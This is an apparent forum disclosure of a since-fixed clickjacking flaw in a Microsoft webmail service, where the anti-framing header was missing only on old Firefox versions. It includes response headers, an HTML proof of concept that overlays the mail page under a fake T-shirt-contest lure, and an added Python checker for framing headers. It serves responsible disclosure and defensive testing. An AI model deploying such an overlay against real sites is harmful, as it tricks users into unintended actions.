

UI redress attack on (affected all pages).

Quote Originally Posted by [s]
On 7/29/13 I reported an XFO vulnerability to the Microsoft Security team, and their investigation has finally come to a conclusion and the bug has been fixed. So, here are the details of the bug and the timeline of fixing it. A year ago, on a weekend, I started digging into MS services for bugs, and this vulnerability seemed interesting enough to share on Garage4Hackers.

The timeline of the investigation of the bug: July 29, 2013 to April 16, 2014.

[Image: msresponse.jpg (Microsoft's response)]

The interesting part of the vulnerability: all pages were protected against UI redressing attacks, and while testing I normally test an application on all browsers. The weird part comes here: I was able to iframe all the pages of , including pre-authentication and post-authentication pages, on Mozilla Firefox 3.6.28 to Mozilla Firefox 6. On Chrome and on other browsers the XFO functionality was working perfectly on all pages.

Random announcement, nothing to do with this post: check out the recorded video of the Garage4Hackers Ranchoddas Webcast Series - Browser Crash Analysis by David Rude II aka Bannedit.
Note: Have a look at the same vulnerability on Facebook Application Installing.

Obviously, you must be thinking why this is happening with Mozilla. After doing some research and consulting with the G4H team, I concluded that it may be an issue with the Gecko engine. The test environment was Win 7 and Ubuntu 10, 11 and 12.
Note: If you stumbled upon the same issue with Gecko, then please reply on this thread.

Check out the following headers; the XFO header is missing on Gecko/20120306 Firefox/3.6.28 to MF 6.


        GET /m/?bfv=wm HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20120306 Firefox/3.6.28
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip,deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Keep-Alive: 115
        Connection: keep-alive

        HTTP/1.1 200 OK
        Content-Type: text/html; charset=utf-8
        Content-Encoding: gzip
        Vary: Accept-Encoding
        Server: Microsoft-IIS/7.5
        X-Wlp-StartTime: 29-07-2013 10:10:32 AM
        xxn: 22
        MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20
        X-Powered-By: ASP.NET
        Content-Length: 3113
        Date: Mon, 29 Jul 2013 10:10:32 GMT
        Connection: keep-alive
        Set-Cookie: bfv=wm;; path=/
        Set-Cookie: widecontext=X; path=/; secure
        Set-Cookie:; path=/
        Set-Cookie: xidseq=7;; path=/
        Set-Cookie: LD=;; expires=Mon, 29-Jul-2013 08:30:32 GMT; path=/
        Cache-Control: no-cache, no-store, must-revalidate, no-transform
        Pragma: no-cache
        Expires: -1, -1
Here are some screenshots of the basic operations of (I would like to remind you, every page of was vulnerable).

The attacker developed this page to attack the victim.

Composing Email :

Uploading Attachment :

Deleting Emails :


HTML POC, which I sent to the MS Security Team:

<!-- This quick-developed POC, for testing purposes -->
<!-- Visit  -->
<html>
<head>
	<title> Live Mail Send Clickjacking - </title>
	<style>
		iframe {
		  position:absolute; top:0; left:0; width:100%; height:100%;
		  filter:alpha(opacity=50); opacity:0.5; /* in real life opacity=0 */
		}
	</style>
</head>
<body>
<div><center>Bhag Milkha Bhag Competition</center></div>
<center><b>Click Connect, You will Bhag Milkha Bhag T-shirts. </b></center>

    <iframe src=""></iframe>
	<a href="" target="_blank" style="position: relative; left: 0px; top: 220px; z-index: -1;">Connect</a>
</body>
</html>

Let me know if you have any questions about this bug.

- [S]
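The finding above is a server that emits X-Frame-Options only for some User-Agents, so a single-browser check would have missed it. The script below is an added example (not the original poster's code) of how to test for exactly that: fetch the same URL once per User-Agent, parse the raw response headers, classify the anti-framing posture (CSP frame-ancestors, X-Frame-Options, or nothing), and flag the case where the result differs between User-Agents. The two sample responses are constructed for the demo: one mirrors the header set quoted in the post (no X-Frame-Options), the other is a hypothetical Chrome response that does carry the header. The URL and the User-Agent strings are assumptions. A live fetch helper is included for real use but is not exercised by the offline demo.

```python
"""Compare framing protection (X-Frame-Options / CSP frame-ancestors)
across User-Agents. Added example for this thread, not the poster's code."""
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

Headers = Dict[str, List[str]]
Protection = Tuple[str, Optional[str]]


def parse_raw_response(raw: str) -> Tuple[int, Headers]:
    """Parse an HTTP/1.x response dump (status line + header lines).
    Header names are lower-cased; repeated headers such as Set-Cookie
    are kept as a list instead of being collapsed."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    headers: Headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def framing_protection(headers: Headers) -> Protection:
    """Classify one response's anti-framing posture.
    ('csp', directive)  CSP frame-ancestors present (supersedes XFO in
                        browsers that support it)
    ('xfo', value)      X-Frame-Options DENY / SAMEORIGIN / ALLOW-FROM
    ('xfo-invalid', v)  XFO present but with a value browsers may ignore,
                        e.g. ALLOWALL or 'DENY, SAMEORIGIN'
    ('none', None)      nothing: the page can be framed cross-origin"""
    for policy in headers.get("content-security-policy", []):
        for directive in policy.split(";"):
            d = directive.strip()
            if d.lower().startswith("frame-ancestors"):
                return ("csp", d)
    for value in headers.get("x-frame-options", []):
        token = value.strip()
        upper = token.upper()
        if upper in ("DENY", "SAMEORIGIN") or upper.startswith("ALLOW-FROM "):
            return ("xfo", token)
        return ("xfo-invalid", token)
    return ("none", None)


def compare_across_user_agents(fetch: Callable[[str, str], str], url: str,
                               user_agents: Dict[str, str]) -> Dict[str, Tuple[int, Protection]]:
    """Fetch `url` once per User-Agent through `fetch(url, ua) -> raw response`
    and return {label: (status, protection)}."""
    results = {}
    for label, ua in user_agents.items():
        status, headers = parse_raw_response(fetch(url, ua))
        results[label] = (status, framing_protection(headers))
    return results


def inconsistent(results: Dict[str, Tuple[int, Protection]]) -> bool:
    """True when at least one UA gets no framing protection while another
    does: the server is deciding per User-Agent, as in this thread."""
    kinds = {protection[0] for _, protection in results.values()}
    return "none" in kinds and len(kinds) > 1


def http_fetch(url: str, user_agent: str) -> str:
    """Live fetch (assumed usage, not run by the demo): returns a response
    dump in the shape parse_raw_response expects. 4xx/5xx still carry
    headers worth inspecting, so HTTPError is treated as a response."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        resp = urllib.request.urlopen(req, timeout=10)
    except urllib.error.HTTPError as err:
        resp = err
    with resp:
        status = getattr(resp, "status", None) or resp.code
        lines = [f"HTTP/1.1 {status} {resp.reason}"]
        lines += [f"{k}: {v}" for k, v in resp.headers.items()]
    return "\n".join(lines)


# Constructed User-Agent strings (assumptions, not captured values).
FIREFOX36_UA = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) Gecko/20120306 Firefox/3.6.28"
CHROME_UA = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"

# Constructed sample responses: the first mirrors the header set quoted in
# the post (no X-Frame-Options); the second is hypothetical and protected.
SAMPLE_RESPONSES = {
    FIREFOX36_UA: """HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Set-Cookie: bfv=wm; path=/
Set-Cookie: widecontext=X; path=/; secure
Cache-Control: no-cache, no-store, must-revalidate, no-transform
""",
    CHROME_UA: """HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache, no-store, must-revalidate, no-transform
""",
}


def demo() -> Dict[str, Tuple[int, Protection]]:
    """Offline run over the constructed responses (URL is a placeholder)."""
    return compare_across_user_agents(lambda url, ua: SAMPLE_RESPONSES[ua],
                                      "https://example.invalid/m/?bfv=wm",
                                      {"firefox-3.6": FIREFOX36_UA, "chrome-28": CHROME_UA})


if __name__ == "__main__":
    r = demo()
    for label, (status, prot) in r.items():
        print(f"{label}: HTTP {status}, protection={prot}")
    print("UA-dependent framing protection:", inconsistent(r))
```

For a real target, swap the lambda for `http_fetch` and run the same User-Agent list against both a pre-authentication and a post-authentication URL, since the post notes both were affected. Treat an `xfo-invalid` result as unprotected: browsers disagree on how to handle unrecognised or doubled X-Frame-Options values, and a CSP `frame-ancestors` directive is the only one that behaves consistently across modern browsers.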


